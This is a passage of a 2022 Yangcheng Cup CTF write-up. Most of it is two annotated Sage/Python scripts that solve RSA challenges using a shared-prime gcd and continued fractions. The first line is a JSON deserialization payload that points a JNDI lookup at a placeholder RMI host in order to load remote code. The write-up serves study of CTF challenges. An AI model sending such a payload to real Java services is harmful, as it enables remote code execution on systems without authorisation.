{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"rmi://xxx:port/tomcat_snakeyaml"}, "msg":{"$ref":"$.content.context"}}
easy_rsa
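#!/usr/bin/env python
# coding: utf-8
# Jupyter/Sage export: `gcd`, `is_prime`, `inverse_mod` and `power_mod` are
# Sage globals (not Python builtins), so run this under a Sage kernel.
# In[19]:
# Read one modulus per line; `with` closes the handle the original left open.
with open("output.txt", "r") as f:
    a = f.readlines()
# In[20]:
# The moduli are applied in reverse file order. The original wrote
# `ns[11-i] = int(a[i])`, hard-wiring exactly 12 lines; reversing is identical
# for 12 lines and also works for any other count. Blank lines are skipped.
ns = [int(line) for line in reversed(a) if line.strip()]
# In[38]:
# All moduli share one prime factor, recovered as the gcd of the first two.
p = gcd(ns[0], ns[1])
tm = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
# In[39]:
e = 65537
# Peel the layered encryption one modulus at a time: q = n / p, then decrypt
# with that modulus's private exponent.
for n in ns:
    q = n // p
    assert is_prime(q)
    d = inverse_mod(e, (p - 1) * (q - 1))
    tm = power_mod(tm, d, n)
# In[40]:
print(tm)
# In[41]:
import libnum
# In[42]:
# In a notebook the bare expression was displayed; as a script it must be
# printed explicitly or the decoded bytes never appear.
print(libnum.n2s(int(tm)))
# In[ ]: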
lrsa
'''
Derivation sketch (author's notes kept verbatim below): the challenge gives
t = (p*P - 58*P + q) mod Q, so (p-58)*P + q differs from t by a multiple k*Q.
Dividing through by k*P shows that Q/P lies within (t+q)/(k*P) < 1/(2k^2) of
(p-58)/k, close enough for (p-58)/k to appear among the convergents of the
continued fraction of Q/P — hence the search loop at the bottom.

t=(p*P-58*P+q)%Q
t=(p*P-58*P+q)+kQ
kQ=t-(p-58)*P+q
kQ/P = (p-58) + (t+q)/P
Q/P = (p-58)/k + (t+q)/(kP)
Q/P - (p-58)/k = (t+q)/(kP) < 1/2k^2
'''
from Crypto.Util.number import *
from gmpy2 import gcd
from sympy import isprime
# Challenge parameters: t and the ciphertext c are given; e is the public
# exponent. (gmpy2's gcd and sympy's isprime are imported but unused; GCD
# and isPrime below come from Crypto.Util.number.)
t=44
e=65537
c=4364802217291010807437827526073499188746160856656033054696031258814848127341094853323797303333741617649819892633013549917144139975939225893749114460910089509552261297408649636515368831194227006310835137628421405558641056278574098849091436284763725120659865442243245486345692476515256604820175726649516152356765363753262839864657243662645981385763738120585801720865252694204286145009527172990713740098977714337038793323846801300955225503801654258983911473974238212956519721447805792992654110642511482243273775873164502478594971816554268730722314333969932527553109979814408613177186842539860073028659812891580301154746
# PPQ and PQQ are presumably P*P*Q and P*Q*Q; their gcd is P*Q, from which
# P and Q are separated by division.
PPQ = 17550772391048142376662352375650397168226219900284185133945819378595084615279414529115194246625188015626268312188291451580718399491413731583962229337205180301248556893326419027312533686033888462669675100382278716791450615542537581657011200868911872550652311318486382920999726120813916439522474691195194557657267042628374572411645371485995174777885120394234154274071083542059010253657420242098856699109476857347677270860654429688935924519805555787949683144015873225388396740487817155358042797286990338440987035608851331840925854381286767024584195081004360635842976624747610461507795755042915965483135990495921912997789567020652729777216671481467049291624343256152446367091568361258918212012737611001009003078023715854575413979603297947011959023398306612437250872299406744778763429172689675430968886613391356192380152315042387148665654062576525633130546454743040442444227245763939134967515614637300940642555367668537324892890004459521919887178391559206373513466653484926149453481758790663522317898916616435463486824881406198956479504970446076256447830689197409184703931842169195650953917594642601134810084247402051464584676932882503143409428970896718980446185114397748313655630266379123438583315809104543663538494519415242569480492899140190587129956835218417371308642212037424611690324353109931657289337536406499314388951678319136343913551598851601805737870217800009086551022197432448461112330252097447894028786035069710260561955740514091976513928307284531381150606428802334767412638213776730300093872457594524254858721551285338651364457529927871215183857169772407595348187949014442596356406144157105062291018215254440382214000573515515859668018846789551567310531570458316720877172632139481792680258388798439064221051325274383331521717987420093245521230610073103811158660291643007279940393509663374960353315388446956868294358252276964954745551655711981
PQQ = 17632503734712698604217167790453868045296303200715867263641257955056721075502316035280716025016839471684329988600978978424661087892466132185482035374940487837109552684763339574491378951189521258328752145077889261805000262141719400516584216130899437363088936913664419705248701787497332582188063869114908628807937049986360525010012039863210179017248132893824655341728382780250878156526086594253092249935304259986328308203344932540888448163430113818706295806406535364433801544858874357459282988110371175948011077595778123265914357153104206808258347815853145593128831233094769191889153762451880396333921190835200889266000562699392602082643298040136498839726733129090381507278582253125509943696419087708429546384313035073010683709744463087794325058122495375333875728593383803489271258323466068830034394348582326189840226236821974979834541554188673335151333713605570214286605391522582123096490317734786072061052604324131559447145448500381240146742679889154145555389449773359530020107821711994953950072547113428811855524572017820861579995449831880269151834230607863568992929328355995768974532894288752369127771516710199600449849031992434777962666440682129817924824151147427747882725858977273856311911431085373396551436319200582072164015150896425482384248479071434032953021738952688256364397405939276917210952583838731888536160866721278250628482428975748118973182256529453045184370543766401320261730361611365906347736001225775255350554164449014831203472238042057456969218316231699556466298168668958678855382462970622819417830000343573014265235688391542452769592096406400900187933156352226983897249981036555748543606676736274049188713348408983072484516372145496924391146241282884948724825393087105077360952770212959517318021248639012476095670769959011548699960423508352158455979906789927951812368185987838359200354730654103428077770839008773864604836807261909
PQ = GCD(PPQ,PQQ)
Q = PQQ // PQ
P = PPQ // PQ
# continued_fraction(...).convergents() is a Sage global (under plain Python
# Q/P would be a float). Each convergent's numerator is a candidate for p-58
# and its denominator for k.
for each in continued_fraction(Q/P).convergents():
    p_58 = each.numerator()
    k = each.denominator()
    p = int(p_58+58)
    # Accept only a 1023-bit prime candidate.
    if p.bit_length() == 1023 and isPrime(int(p)):
        # t=(p*P-58*P+q)%Q
        # Recover q from the relation above, then do a textbook RSA decryption
        # with modulus p*q.
        q = (t-p*P+58*P) % Q
        phi = (p-1)*(q-1)
        d = inverse(e,phi)
        m = pow(c,d,p*q)
        print(long_to_bytes(m))
原文始发于微信公众号(山石网科安全技术研究院):2022年羊城杯部分WriteUp